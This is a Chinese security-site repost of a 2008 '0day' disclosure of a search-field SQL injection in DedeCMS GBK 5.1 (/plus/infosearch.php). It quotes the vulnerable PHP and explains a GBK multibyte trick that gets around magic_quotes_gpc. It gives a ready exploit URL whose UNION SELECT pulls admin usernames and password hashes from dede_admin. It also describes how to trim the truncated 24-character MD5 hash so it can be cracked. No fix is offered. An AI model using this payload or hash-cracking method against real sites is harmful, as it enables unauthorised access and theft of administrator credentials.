首页 网络安全 安全学院 查看内容

dedecms GBK 5.1 搜索型注射0day

2008-11-10 10:06 840 0

摘要:   漏洞发掘: 大伟 & char 银河安全网 www.yhsafe.com  漏洞地址:/plus/infosearch.php  漏洞成因:  $q = trim($q);  if($ar...
关键词: 加密 漏洞 密码 dedecms 大伟 areaid infosearch php senddate wheresql

  漏洞发掘: 大伟 & char 银河安全网 www.yhsafe.com  漏洞地址:/plus/infosearch.php  漏洞成因:  $q = trim($q);  if($areaid > 0) {  $wheresql = "areaid=$areaid and ";  }  $query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";  获得变量q,直接放入数据库查询.导致注入产生,这样一个搜索型的注入,本身对于php环境如果设置了magic_quote_gpc=on的话,利用起来是很难的.但是可以结合php多字节编码漏洞,这样,一个相对来说不错的利用方式产生了.可以如下构造,通过get方式提交.  利用地址:  http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*  补充:dedecms暴出来的管理员密码只有24位,这里我简单的来说一下,dedecms首先获得某密码的32位MD5加密值,然后去掉后面8位,这样,拿剩下的24位来做为密码的加密值.这里我们可以想到,32位转16位可以把32位的前8位和后8位去掉,剩下的中间就是其16位的加密值,于是,我们可以把dedecms中暴出来的那窜24位加密值的前8位去掉,剩下的16位就可以拿去破解了.
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部